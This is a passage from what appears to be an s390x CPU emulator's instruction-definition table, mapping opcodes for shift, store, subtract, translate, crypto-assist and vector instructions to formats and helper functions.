OIHF, RIL_a, EI, r1_o, i2_32u, r1, 0, ori, 0, 0x2020) D(0xc00d, OILF, RIL_a, EI, r1_o, i2_32u, r1, 0, ori, 0, 0x2000) D(0xa508, OIHH, RI_a, Z, r1_o, i2_16u, r1, 0, ori, 0, 0x1030) D(0xa509, OIHL, RI_a, Z, r1_o, i2_16u, r1, 0, ori, 0, 0x1020) D(0xa50a, OILH, RI_a, Z, r1_o, i2_16u, r1, 0, ori, 0, 0x1010) D(0xa50b, OILL, RI_a, Z, r1_o, i2_16u, r1, 0, ori, 0, 0x1000) D(0x9600, OI, SI, Z, la1, i2_8u, new, 0, oi, nz64, MO_UB) D(0xeb56, OIY, SIY, LD, la1, i2_8u, new, 0, oi, nz64, MO_UB) /* PACK */ /* Really format SS_b, but we pack both lengths into one argument for the helper call, so we might as well leave one 8-bit field. */ C(0xf200, PACK, SS_a, Z, la1, a2, 0, 0, pack, 0) /* PACK ASCII */ C(0xe900, PKA, SS_f, E2, la1, a2, 0, 0, pka, 0) /* PACK UNICODE */ C(0xe100, PKU, SS_f, E2, la1, a2, 0, 0, pku, 0) /* PREFETCH */ /* Implemented as nops of course. */ C(0xe336, PFD, RXY_b, GIE, 0, 0, 0, 0, 0, 0) C(0xc602, PFDRL, RIL_c, GIE, 0, 0, 0, 0, 0, 0) /* PERFORM PROCESSOR ASSIST */ /* Implemented as nop of course. */ C(0xb2e8, PPA, RRF_c, PPA, 0, 0, 0, 0, 0, 0) /* POPULATION COUNT */ C(0xb9e1, POPCNT, RRE, PC, 0, r2_o, r1, 0, popcnt, nz64) /* ROTATE LEFT SINGLE LOGICAL */ C(0xeb1d, RLL, RSY_a, Z, r3_o, sh, new, r1_32, rll32, 0) C(0xeb1c, RLLG, RSY_a, Z, r3_o, sh, r1, 0, rll64, 0) /* ROTATE THEN INSERT SELECTED BITS */ C(0xec55, RISBG, RIE_f, GIE, 0, r2, r1, 0, risbg, s64) C(0xec59, RISBGN, RIE_f, MIE, 0, r2, r1, 0, risbg, 0) C(0xec5d, RISBHG, RIE_f, HW, 0, r2, r1, 0, risbg, 0) C(0xec51, RISBLG, RIE_f, HW, 0, r2, r1, 0, risbg, 0) /* ROTATE_THEN <OP> SELECTED BITS */ C(0xec54, RNSBG, RIE_f, GIE, 0, r2, r1, 0, rosbg, 0) C(0xec56, ROSBG, RIE_f, GIE, 0, r2, r1, 0, rosbg, 0) C(0xec57, RXSBG, RIE_f, GIE, 0, r2, r1, 0, rosbg, 0) /* SEARCH STRING */ C(0xb25e, SRST, RRE, Z, 0, 0, 0, 0, srst, 0) /* SEARCH STRING UNICODE */ C(0xb9be, SRSTU, RRE, ETF3, 0, 0, 0, 0, srstu, 0) /* SET ACCESS */ C(0xb24e, SAR, RRE, Z, 0, r2_o, 0, 0, sar, 0) /* SET ADDRESSING MODE */ D(0x010c, SAM24, E, Z, 0, 0, 0, 0, sam, 0, 0) D(0x010d, SAM31, E, Z, 0, 0, 0, 0, sam, 0, 1) D(0x010e, SAM64, E, Z, 0, 0, 0, 0, sam, 0, 3) /* SET FPC */ F(0xb384, SFPC, RRE, Z, 0, r1_o, 0, 0, sfpc, 0, IF_BFP) /* SET FPC AND SIGNAL */ F(0xb385, SFASR, RRE, IEEEE_SIM, 0, r1_o, 0, 0, sfas, 0, IF_DFP) /* SET BFP ROUNDING MODE */ F(0xb299, SRNM, S, Z, la2, 0, 0, 0, srnm, 0, IF_BFP) F(0xb2b8, SRNMB, S, FPE, la2, 0, 0, 0, srnmb, 0, IF_BFP) /* SET DFP ROUNDING MODE */ F(0xb2b9, SRNMT, S, DFPR, la2, 0, 0, 0, srnmt, 0, IF_DFP) /* SET PROGRAM MASK */ C(0x0400, SPM, RR_a, Z, r1, 0, 0, 0, spm, 0) /* SHIFT LEFT SINGLE */ D(0x8b00, SLA, RS_a, Z, r1, sh, new, r1_32, sla, 0, 31) D(0xebdd, SLAK, RSY_a, DO, r3, sh, new, r1_32, sla, 0, 31) D(0xeb0b, SLAG, RSY_a, Z, r3, sh, r1, 0, sla, 0, 63) /* SHIFT LEFT SINGLE LOGICAL */ C(0x8900, SLL, RS_a, Z, r1_o, sh, new, r1_32, sll, 0) C(0xebdf, SLLK, RSY_a, DO, r3_o, sh, new, r1_32, sll, 0) C(0xeb0d, SLLG, RSY_a, Z, r3_o, sh, r1, 0, sll, 0) /* SHIFT RIGHT SINGLE */ C(0x8a00, SRA, RS_a, Z, r1_32s, sh, new, r1_32, sra, s32) C(0xebdc, SRAK, RSY_a, DO, r3_32s, sh, new, r1_32, sra, s32) C(0xeb0a, SRAG, RSY_a, Z, r3_o, sh, r1, 0, sra, s64) /* SHIFT RIGHT SINGLE LOGICAL */ C(0x8800, SRL, RS_a, Z, r1_32u, sh, new, r1_32, srl, 0) C(0xebde, SRLK, RSY_a, DO, r3_32u, sh, new, r1_32, srl, 0) C(0xeb0c, SRLG, RSY_a, Z, r3_o, sh, r1, 0, srl, 0) /* SHIFT LEFT DOUBLE */ D(0x8f00, SLDA, RS_a, Z, r1_D32, sh, new, r1_D32, sla, 0, 63) /* SHIFT LEFT DOUBLE LOGICAL */ C(0x8d00, SLDL, RS_a, Z, r1_D32, sh, new, r1_D32, sll, 0) /* SHIFT RIGHT DOUBLE */ C(0x8e00, SRDA, RS_a, Z, r1_D32, sh, new, r1_D32, sra, s64) /* SHIFT RIGHT DOUBLE LOGICAL */ C(0x8c00, SRDL, RS_a, Z, r1_D32, sh, new, r1_D32, srl, 0) /* SQUARE ROOT */ F(0xb314, SQEBR, RRE, Z, 0, e2, new, e1, sqeb, 0, IF_BFP) F(0xb315, SQDBR, RRE, Z, 0, f2, new, f1, sqdb, 0, IF_BFP) F(0xb316, SQXBR, RRE, Z, x2h, x2l, new, x1, sqxb, 0, IF_BFP) F(0xed14, SQEB, RXE, Z, 0, m2_32u, new, e1, sqeb, 0, IF_BFP) F(0xed15, SQDB, RXE, Z, 0, m2_64, new, f1, sqdb, 0, IF_BFP) /* STORE */ C(0x5000, ST, RX_a, Z, r1_o, a2, 0, 0, st32, 0) C(0xe350, STY, RXY_a, LD, r1_o, a2, 0, 0, st32, 0) C(0xe324, STG, RXY_a, Z, r1_o, a2, 0, 0, st64, 0) F(0x6000, STD, RX_a, Z, f1, a2, 0, 0, st64, 0, IF_AFP1) F(0xed67, STDY, RXY_a, LD, f1, a2, 0, 0, st64, 0, IF_AFP1) F(0x7000, STE, RX_a, Z, e1, a2, 0, 0, st32, 0, IF_AFP1) F(0xed66, STEY, RXY_a, LD, e1, a2, 0, 0, st32, 0, IF_AFP1) /* STORE RELATIVE LONG */ C(0xc40f, STRL, RIL_b, GIE, r1_o, ri2, 0, 0, st32, 0) C(0xc40b, STGRL, RIL_b, GIE, r1_o, ri2, 0, 0, st64, 0) /* STORE CHARACTER */ C(0x4200, STC, RX_a, Z, r1_o, a2, 0, 0, st8, 0) C(0xe372, STCY, RXY_a, LD, r1_o, a2, 0, 0, st8, 0) /* STORE CHARACTER HIGH */ C(0xe3c3, STCH, RXY_a, HW, r1_sr32, a2, 0, 0, st8, 0) /* STORE CHARACTERS UNDER MASK */ D(0xbe00, STCM, RS_b, Z, r1_o, a2, 0, 0, stcm, 0, 0) D(0xeb2d, STCMY, RSY_b, LD, r1_o, a2, 0, 0, stcm, 0, 0) D(0xeb2c, STCMH, RSY_b, Z, r1_o, a2, 0, 0, stcm, 0, 32) /* STORE HALFWORD */ C(0x4000, STH, RX_a, Z, r1_o, a2, 0, 0, st16, 0) C(0xe370, STHY, RXY_a, LD, r1_o, a2, 0, 0, st16, 0) /* STORE HALFWORD HIGH */ C(0xe3c7, STHH, RXY_a, HW, r1_sr32, a2, 0, 0, st16, 0) /* STORE HALFWORD RELATIVE LONG */ C(0xc407, STHRL, RIL_b, GIE, r1_o, ri2, 0, 0, st16, 0) /* STORE HIGH */ C(0xe3cb, STFH, RXY_a, HW, r1_sr32, a2, 0, 0, st32, 0) /* STORE ON CONDITION */ D(0xebf3, STOC, RSY_b, LOC, 0, 0, 0, 0, soc, 0, 0) D(0xebe3, STOCG, RSY_b, LOC, 0, 0, 0, 0, soc, 0, 1) /* STORE HIGH ON CONDITION */ D(0xebe1, STOCFH, RSY_b, LOC2, 0, 0, 0, 0, soc, 0, 2) /* STORE REVERSED */ C(0xe33f, STRVH, RXY_a, Z, la2, r1_16u, new, m1_16, rev16, 0) C(0xe33e, STRV, RXY_a, Z, la2, r1_32u, new, m1_32, rev32, 0) C(0xe32f, STRVG, RXY_a, Z, la2, r1_o, new, m1_64, rev64, 0) /* STORE CLOCK */ C(0xb205, STCK, S, Z, la2, 0, new, m1_64, stck, 0) C(0xb27c, STCKF, S, SCF, la2, 0, new, m1_64, stck, 0) /* STORE CLOCK EXTENDED */ C(0xb278, STCKE, S, Z, 0, a2, 0, 0, stcke, 0) /* STORE FACILITY LIST EXTENDED */ C(0xb2b0, STFLE, S, SFLE, 0, a2, 0, 0, stfle, 0) /* STORE FPC */ F(0xb29c, STFPC, S, Z, 0, a2, new, m2_32, efpc, 0, IF_BFP) /* STORE MULTIPLE */ D(0x9000, STM, RS_a, Z, 0, a2, 0, 0, stm, 0, 4) D(0xeb90, STMY, RSY_a, LD, 0, a2, 0, 0, stm, 0, 4) D(0xeb24, STMG, RSY_a, Z, 0, a2, 0, 0, stm, 0, 8) /* STORE MULTIPLE HIGH */ C(0xeb26, STMH, RSY_a, Z, 0, a2, 0, 0, stmh, 0) /* STORE ACCESS MULTIPLE */ C(0x9b00, STAM, RS_a, Z, 0, a2, 0, 0, stam, 0) C(0xeb9b, STAMY, RSY_a, LD, 0, a2, 0, 0, stam, 0) /* STORE PAIR TO QUADWORD */ C(0xe38e, STPQ, RXY_a, Z, 0, a2, r1_P, 0, stpq, 0) /* SUBTRACT */ C(0x1b00, SR, RR_a, Z, r1, r2, new, r1_32, sub, subs32) C(0xb9f9, SRK, RRF_a, DO, r2, r3, new, r1_32, sub, subs32) C(0x5b00, S, RX_a, Z, r1, m2_32s, new, r1_32, sub, subs32) C(0xe35b, SY, RXY_a, LD, r1, m2_32s, new, r1_32, sub, subs32) C(0xb909, SGR, RRE, Z, r1, r2, r1, 0, sub, subs64) C(0xb919, SGFR, RRE, Z, r1, r2_32s, r1, 0, sub, subs64) C(0xb9e9, SGRK, RRF_a, DO, r2, r3, r1, 0, sub, subs64) C(0xe309, SG, RXY_a, Z, r1, m2_64, r1, 0, sub, subs64) C(0xe319, SGF, RXY_a, Z, r1, m2_32s, r1, 0, sub, subs64) F(0xb30b, SEBR, RRE, Z, e1, e2, new, e1, seb, f32, IF_BFP) F(0xb31b, SDBR, RRE, Z, f1, f2, new, f1, sdb, f64, IF_BFP) F(0xb34b, SXBR, RRE, Z, x2h, x2l, x1, x1, sxb, f128, IF_BFP) F(0xed0b, SEB, RXE, Z, e1, m2_32u, new, e1, seb, f32, IF_BFP) F(0xed1b, SDB, RXE, Z, f1, m2_64, new, f1, sdb, f64, IF_BFP) /* SUBTRACT HALFWORD */ C(0x4b00, SH, RX_a, Z, r1, m2_16s, new, r1_32, sub, subs32) C(0xe37b, SHY, RXY_a, LD, r1, m2_16s, new, r1_32, sub, subs32) /* SUBTRACT HIGH */ C(0xb9c9, SHHHR, RRF_a, HW, r2_sr32, r3_sr32, new, r1_32h, sub, subs32) C(0xb9d9, SHHLR, RRF_a, HW, r2_sr32, r3, new, r1_32h, sub, subs32) /* SUBTRACT LOGICAL */ C(0x1f00, SLR, RR_a, Z, r1, r2, new, r1_32, sub, subu32) C(0xb9fb, SLRK, RRF_a, DO, r2, r3, new, r1_32, sub, subu32) C(0x5f00, SL, RX_a, Z, r1, m2_32u, new, r1_32, sub, subu32) C(0xe35f, SLY, RXY_a, LD, r1, m2_32u, new, r1_32, sub, subu32) C(0xb90b, SLGR, RRE, Z, r1, r2, r1, 0, sub, subu64) C(0xb91b, SLGFR, RRE, Z, r1, r2_32u, r1, 0, sub, subu64) C(0xb9eb, SLGRK, RRF_a, DO, r2, r3, r1, 0, sub, subu64) C(0xe30b, SLG, RXY_a, Z, r1, m2_64, r1, 0, sub, subu64) C(0xe31b, SLGF, RXY_a, Z, r1, m2_32u, r1, 0, sub, subu64) /* SUBTRACT LOCICAL HIGH */ C(0xb9cb, SLHHHR, RRF_a, HW, r2_sr32, r3_sr32, new, r1_32h, sub, subu32) C(0xb9db, SLHHLR, RRF_a, HW, r2_sr32, r3, new, r1_32h, sub, subu32) /* SUBTRACT LOGICAL IMMEDIATE */ C(0xc205, SLFI, RIL_a, EI, r1, i2_32u, new, r1_32, sub, subu32) C(0xc204, SLGFI, RIL_a, EI, r1, i2_32u, r1, 0, sub, subu64) /* SUBTRACT LOGICAL WITH BORROW */ C(0xb999, SLBR, RRE, Z, r1, r2, new, r1_32, subb, subb32) C(0xb989, SLBGR, RRE, Z, r1, r2, r1, 0, subb, subb64) C(0xe399, SLB, RXY_a, Z, r1, m2_32u, new, r1_32, subb, subb32) C(0xe389, SLBG, RXY_a, Z, r1, m2_64, r1, 0, subb, subb64) /* SUPERVISOR CALL */ C(0x0a00, SVC, I, Z, 0, 0, 0, 0, svc, 0) /* TEST ADDRESSING MODE */ C(0x010b, TAM, E, Z, 0, 0, 0, 0, tam, 0) /* TEST AND SET */ C(0x9300, TS, S, Z, 0, a2, 0, 0, ts, 0) /* TEST DATA CLASS */ F(0xed10, TCEB, RXE, Z, e1, a2, 0, 0, tceb, 0, IF_BFP) F(0xed11, TCDB, RXE, Z, f1, a2, 0, 0, tcdb, 0, IF_BFP) F(0xed12, TCXB, RXE, Z, 0, a2, x1, 0, tcxb, 0, IF_BFP) /* TEST DECIMAL */ C(0xebc0, TP, RSL, E2, la1, 0, 0, 0, tp, 0) /* TEST UNDER MASK */ C(0x9100, TM, SI, Z, m1_8u, i2_8u, 0, 0, 0, tm32) C(0xeb51, TMY, SIY, LD, m1_8u, i2_8u, 0, 0, 0, tm32) D(0xa702, TMHH, RI_a, Z, r1_o, i2_16u_shl, 0, 0, 0, tm64, 48) D(0xa703, TMHL, RI_a, Z, r1_o, i2_16u_shl, 0, 0, 0, tm64, 32) D(0xa700, TMLH, RI_a, Z, r1_o, i2_16u_shl, 0, 0, 0, tm64, 16) D(0xa701, TMLL, RI_a, Z, r1_o, i2_16u_shl, 0, 0, 0, tm64, 0) /* TRANSLATE */ C(0xdc00, TR, SS_a, Z, la1, a2, 0, 0, tr, 0) /* TRANSLATE AND TEST */ C(0xdd00, TRT, SS_a, Z, la1, a2, 0, 0, trt, 0) /* TRANSLATE AND TEST REVERSE */ C(0xd000, TRTR, SS_a, ETF3, la1, a2, 0, 0, trtr, 0) /* TRANSLATE EXTENDED */ C(0xb2a5, TRE, RRE, Z, 0, r2, r1_P, 0, tre, 0) /* TRANSLATE ONE TO ONE */ C(0xb993, TROO, RRF_c, E2, 0, 0, 0, 0, trXX, 0) /* TRANSLATE ONE TO TWO */ C(0xb992, TROT, RRF_c, E2, 0, 0, 0, 0, trXX, 0) /* TRANSLATE TWO TO ONE */ C(0xb991, TRTO, RRF_c, E2, 0, 0, 0, 0, trXX, 0) /* TRANSLATE TWO TO TWO */ C(0xb990, TRTT, RRF_c, E2, 0, 0, 0, 0, trXX, 0) /* UNPACK */ /* Really format SS_b, but we pack both lengths into one argument for the helper call, so we might as well leave one 8-bit field. */ C(0xf300, UNPK, SS_a, Z, la1, a2, 0, 0, unpk, 0) /* UNPACK ASCII */ C(0xea00, UNPKA, SS_a, E2, la1, a2, 0, 0, unpka, 0) /* UNPACK UNICODE */ C(0xe200, UNPKU, SS_a, E2, la1, a2, 0, 0, unpku, 0) /* MSA Instructions */ D(0xb91e, KMAC, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMAC) D(0xb928, PCKMO, RRE, MSA3, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_PCKMO) D(0xb92a, KMF, RRE, MSA4, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMF) D(0xb92b, KMO, RRE, MSA4, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMO) D(0xb92c, PCC, RRE, MSA4, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_PCC) D(0xb92d, KMCTR, RRF_b, MSA4, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMCTR) D(0xb92e, KM, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KM) D(0xb92f, KMC, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMC) D(0xb93c, PPNO, RRE, MSA5, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_PPNO) D(0xb93e, KIMD, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KIMD) D(0xb93f, KLMD, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KLMD) /* === Vector Support Instructions === */ /* VECTOR GATHER ELEMENT */ E(0xe713, VGEF, VRV, V, la2, 0, 0, 0, vge, 0, ES_32, IF_VEC) E(0xe712, VGEG, VRV, V, la2, 0, 0, 0, vge, 0, ES_64, IF_VEC) /* VECTOR GENERATE BYTE MASK */ F(0xe744, VGBM, VRI_a, V, 0, 0, 0, 0, vgbm, 0, IF_VEC) /* VECTOR GENERATE MASK */ F(0xe746, VGM, VRI_b, V, 0, 0, 0, 0, vgm, 0, IF_VEC) /* VECTOR LOAD */ F(0xe706, VL, VRX, V, la2, 0, 0, 0, vl, 0, IF_VEC) F(0xe756, VLR, VRR_a, V, 0, 0, 0, 0, vlr, 0, IF_VEC) /* VECTOR LOAD AND REPLICATE */ F(0xe705, VLREP, VRX, V, la2, 0, 0, 0, vlrep, 0, IF_VEC) /* VECTOR LOAD ELEMENT */ E(0xe700, VLEB, VRX, V, la2, 0, 0, 0, vle, 0, ES_8, IF_VEC) E(0xe701, VLEH, VRX, V, la2, 0, 0, 0, vle, 0, ES_16, IF_VEC) E(0xe703, VLEF, VRX, V, la2, 0, 0, 0, vle, 0, ES_32, IF_VEC) E(0xe702, VLEG, VRX, V, la2, 0, 0, 0, vle, 0, ES_64, IF_VEC) /* VECTOR LOAD ELEMENT IMMEDIATE */ E(0xe740, VLEIB, VRI_a, V, 0, 0, 0, 0, vlei, 0, ES_8, IF_VEC) E(0xe741, VLEIH, VRI_a, V, 0, 0, 0, 0, vlei, 0, ES_16, IF_VEC) E(0xe743, VLEIF, VRI_a, V, 0, 0, 0, 0, vlei, 0, ES_32, IF_VEC) E(0xe742, VLEIG, VRI_a, V, 0, 0, 0, 0, vlei, 0, ES_64, IF_VEC) /* VECTOR LOAD GR FROM VR ELEMENT */ F(0xe721, VLGV, VRS_c, V, la2, 0, r1, 0, vlgv, 0, IF_VEC) /* VECTOR LOAD LOGICAL ELEMENT AND ZERO */ F(0xe704, VLLEZ, VRX, V, la2, 0, 0, 0, vllez, 0, IF_VEC) /* VECTOR LOAD MULTIPLE */ F(0xe736, VLM, VRS_a, V, la2, 0, 0, 0, vlm, 0, IF_VEC) /* VECTOR LOAD TO BLOCK BOUNDARY */ F(0xe707, VLBB, VRX, V, la2, 0, 0, 0, vlbb, 0, IF_VEC) /* VECTOR LOAD VR ELEMENT FROM GR */ F(0xe722, VLVG, VRS_b, V, la2, r3, 0, 0, vlvg, 0, IF_VEC) /* VECTOR LOAD VR FROM GRS DISJOINT */ F(0xe762, VLVGP, VRR_f, V, r2, r3, 0, 0, vlvgp, 0, IF_VEC) /* VECTOR LOAD WITH LENGTH */ F(0xe737, VLL, VRS_b, V, la2, r3_32u, 0, 0, vll, 0, IF_VEC) /* VECTOR MERGE HIGH */ F(0xe761, VMRH, VRR_c, V, 0, 0, 0, 0, vmr, 0, IF_VEC) /* VECTOR MERGE LOW */ F(0xe760, VMRL, VRR_c, V, 0, 0, 0, 0, vmr, 0, IF_VEC) /* VECTOR PACK */ F(0xe794, VPK, VRR_c, V, 0, 0, 0, 0, vpk, 0, IF_VEC) /* VECTOR PACK SATURATE */ F(0xe797, VPKS, VRR_b, V, 0, 0, 0, 0, vpk, 0, IF_VEC) /* VECTOR PACK LOGICAL SATURATE */ F(0xe795, VPKLS, VRR_b, V, 0, 0, 0, 0, vpk, 0, IF_VEC) F(0xe78c, VPERM, VRR_e, V, 0, 0, 0, 0, vperm, 0, IF_VEC) /* VECTOR PERMUTE DOUBLEWORD IMMEDIATE */ F(0xe784, VPDI, VRR_c, V, 0, 0, 0, 0, vpdi, 0, IF_VEC) /* VECTOR REPLICATE */ F(0xe74d, VREP, VRI_c, V, 0, 0, 0, 0, vrep, 0, IF_VEC) /* VECTOR REPLICATE IMMEDIATE */ F(0xe745, VREPI, VRI_a, V, 0, 0, 0, 0, vrepi, 0, IF_VEC) /* VECTOR SCATTER ELEMENT */ E(0xe71b, VSCEF, VRV, V, la2, 0, 0, 0, vsce, 0, ES_32, IF_VEC) E(0xe71a, VSCEG, VRV, V, la2, 0, 0, 0, vsce, 0, ES_64, IF_VEC) /* VECTOR SELECT */ F(0xe78d, VSEL, VRR_e, V, 0, 0, 0, 0, vsel, 0, IF_VEC) /* VECTOR SIGN EXTEND TO DOUBLEWORD */ F(0xe75f, VSEG, VRR_a, V, 0, 0, 0, 0, vseg, 0, IF_VEC) /* VECTOR STORE */ F(0xe70e, VST, VRX, V, la2, 0, 0, 0, vst, 0, IF_VEC) /* VECTOR STORE ELEMENT */ E(0xe708, VSTEB, VRX, V, la2, 0, 0, 0, vste, 0, ES_8, IF_VEC) E(0xe709, VSTEH, VRX, V, la2, 0, 0, 0, vste, 0, ES_16, IF_VEC) E(0xe70b, VSTEF, VRX, V, la2, 0, 0, 0, vste, 0, ES_32, IF_VEC) E(0xe70a, VSTEG, VRX, V, la2, 0, 0, 0, vste, 0, ES_64, IF_VEC) /* VECTOR STORE MULTIPLE */ F(0xe73e, VSTM, VRS_a, V, la2, 0, 0, 0, vstm, 0, IF_VEC) /* VECTOR STORE WITH LENGTH */ F(0xe73f, VSTL, VRS_b, V, la2, r3_32u, 0, 0, vstl, 0, IF_VEC) /* VECTOR UNPACK HIGH */ F(0xe7d7, VUPH, VRR_a, V, 0, 0, 0, 0, vup, 0, IF_VEC) /* VECTOR UNPACK LOGICAL HIGH */ F(0xe7d5, VUPLH, VRR_a, V, 0, 0, 0, 0, vup, 0, IF_VEC) /* VECTOR UNPACK LOW */ F(0xe7d6, VUPL, VRR_a, V, 0, 0, 0, 0, vup, 0, IF_VEC) /* VECTOR UNPACK LOGICAL LOW */ F(0xe7d4, VUPLL, VRR_a, V, 0, 0, 0, 0, vup, 0, IF_VEC) /* === Vector Integer Instructions === */ /* VECTOR ADD */ F(0xe7f3, VA, VRR_c, V, 0, 0, 0, 0, va, 0, IF_VEC) /* VECTOR ADD COMPUTE CARRY */ F(0xe7f1, VACC, VRR_c, V, 0, 0, 0, 0, vacc, 0, IF_VEC) /* VECTOR ADD WITH CARRY */ F(0xe7bb, VAC, VRR_d, V, 0, 0, 0, 0, vac, 0, IF_VEC) /* VECTOR ADD WITH CARRY COMPUTE CARRY */ F(0xe7b9, VACCC, VRR_d, V, 0, 0, 0, 0, vaccc, 0, IF_VEC) /* VECTOR AND */ F(0xe768, VN, VRR_c, V, 0, 0, 0, 0, vn, 0, IF_VEC) /* VECTOR AND WITH COMPLEMENT */ F(0xe769, VNC, VRR_c, V, 0, 0, 0, 0, vnc, 0, IF_VEC) /* VECTOR AVERAGE */ F(0xe7f2, VAVG, VRR_c, V, 0, 0, 0, 0, vavg, 0, IF_VEC) /* VECTOR AVERAGE LOGICAL */ F(0xe7f0, VAVGL, VRR_c, V, 0, 0, 0, 0, vavgl, 0, IF_VEC) /* VECTOR CHECKSUM */ F(0xe766, VCKSM, VRR_c, V, 0, 0, 0, 0, vcksm, 0, IF_VEC) /* VECTOR ELEMENT COMPARE */ F(0xe7db, VEC, VRR_a, V, 0, 0, 0, 0, vec, cmps64, IF_VEC) /* VECTOR ELEMENT COMPARE LOGICAL */ F(0xe7d9, VECL, VRR_a, V, 0, 0, 0, 0, vec, cmpu64, IF_VEC) /* VECTOR COMPARE EQUAL */ E(0xe7f8, VCEQ, VRR_b, V, 0, 0, 0, 0, vc, 0, TCG_COND_EQ, IF_VEC) /* VECTOR COMPARE HIGH */ E(0xe7fb, VCH, VRR_b, V, 0, 0, 0, 0, vc, 0, TCG_COND_GT, IF_VEC) /* VECTOR COMPARE HIGH LOGICAL */ E(0xe7f9, VCHL, VRR_b, V, 0, 0, 0, 0, vc, 0, TCG_COND_GTU, IF_VEC) /* VECTOR COUNT LEADING ZEROS */ F(0xe753, VCLZ, VRR_a, V, 0, 0, 0, 0, vclz, 0, IF_VEC) /* VECTOR COUNT TRAILING ZEROS */ F(0xe752, VCTZ, VRR_a, V, 0, 0, 0, 0, vctz, 0, IF_VEC) /* VECTOR EXCLUSIVE OR */ F(0xe76d, VX, VRR_c, V, 0, 0, 0, 0, vx, 0, IF_VEC) /* VECTOR GALOIS FIELD MULTIPLY SUM */ F(0xe7b4, VGFM, VRR_c, V, 0, 0, 0, 0, vgfm, 0, IF_VEC) /* VECTOR GALOIS FIELD MULTIPLY SUM AND ACCUMULATE */ F(0xe7bc, VGFMA, VRR_d, V, 0, 0, 0, 0, vgfma, 0, IF_VEC) /* VECTOR LOAD COMPLEMENT */ F(0xe7de, VLC, VRR_a, V, 0, 0, 0, 0, vlc, 0, IF_VEC) /* VECTOR LOAD POSITIVE */ F(0xe7df, VLP, VRR_a, V, 0, 0, 0, 0, vlp, 0, IF_VEC) /* VECTOR MAXIMUM */ F(0xe7ff, VMX, VRR_c, V, 0, 0, 0, 0, vmx, 0, IF_VEC) /* VECTOR MAXIMUM LOGICAL */ F(0xe7fd, VMXL, VRR_c, V, 0, 0, 0, 0, vmx, 0, IF_VEC) /* VECTOR MINIMUM */ F(0xe7fe, VMN, VRR_c, V, 0, 0, 0, 0, vmx, 0, IF_VEC) /* VECTOR MINIMUM LOGICAL */ F(0xe7fc, VMNL, VRR_c, V, 0, 0, 0, 0, vmx, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD LOW */ F(0xe7aa, VMAL, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD HIGH */ F(0xe7ab, VMAH, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD LOGICAL HIGH */ F(0xe7a9, VMALH, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD EVEN */ F(0xe7ae, VMAE, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD LOGICAL EVEN */ F(0xe7ac, VMALE, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD ODD */ F(0xe7af, VMAO, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD LOGICAL ODD */ F(0xe7ad, VMALO, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY HIGH */ F(0xe7a3, VMH, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY LOGICAL HIGH */ F(0xe7a1, VMLH, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY LOW */ F(0xe7a2, VML, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY EVEN */ F(0xe7a6, VME, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY LOGICAL EVEN */ F(0xe7a4, VMLE, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY ODD */ F(0xe7a7, VMO, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY LOGICAL ODD */ F(0xe7a5, VMLO, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR NAND */ F(0xe76e, VNN, VRR_c, VE, 0, 0, 0, 0, vnn, 0, IF_VEC) /* VECTOR NOR */ F(0xe76b, VNO, VRR_c, V, 0, 0, 0, 0, vno, 0, IF_VEC) /* VECTOR NOT EXCLUSIVE OR */ F(0xe76c, VNX, VRR_c, VE, 0, 0, 0, 0, vnx, 0, IF_VEC) /* VECTOR OR */ F(0xe76a, VO, VRR_c, V, 0, 0, 0, 0, vo, 0, IF_VEC) /* VECTOR OR WITH COMPLEMENT */ F(0xe76f, VOC, VRR_c, VE, 0, 0, 0, 0, voc, 0, IF_VEC) /* VECTOR POPULATION COUNT */ F(0xe750, VPOPCT, VRR_a, V, 0, 0, 0, 0, vpopct, 0, IF_VEC) /* VECTOR ELEMENT ROTATE LEFT LOGICAL */ F(0xe773, VERLLV, VRR_c, V, 0, 0, 0, 0, verllv, 0, IF_VEC) F(0xe733, VERLL, VRS_a, V, la2, 0, 0, 0, verll, 0, IF_VEC) /* VECTOR ELEMENT ROTATE AND INSERT UNDER MASK */ F(0xe772, VERIM, VRI_d, V, 0, 0, 0, 0, verim, 0, IF_VEC) /* VECTOR ELEMENT SHIFT LEFT */ F(0xe770, VESLV, VRR_c, V, 0, 0, 0, 0, vesv, 0, IF_VEC) F(0xe730, VESL, VRS_a, V, la2, 0, 0, 0, ves, 0, IF_VEC) /* VECTOR ELEMENT SHIFT RIGHT ARITHMETIC */ F(0xe77a, VESRAV, VRR_c, V, 0, 0, 0, 0, vesv, 0, IF_VEC) F(0xe73a, VESRA, VRS_a, V, la2, 0, 0, 0, ves, 0, IF_VEC) /* VECTOR ELEMENT SHIFT RIGHT LOGICAL */ F(0xe778, VESRLV, VRR_c, 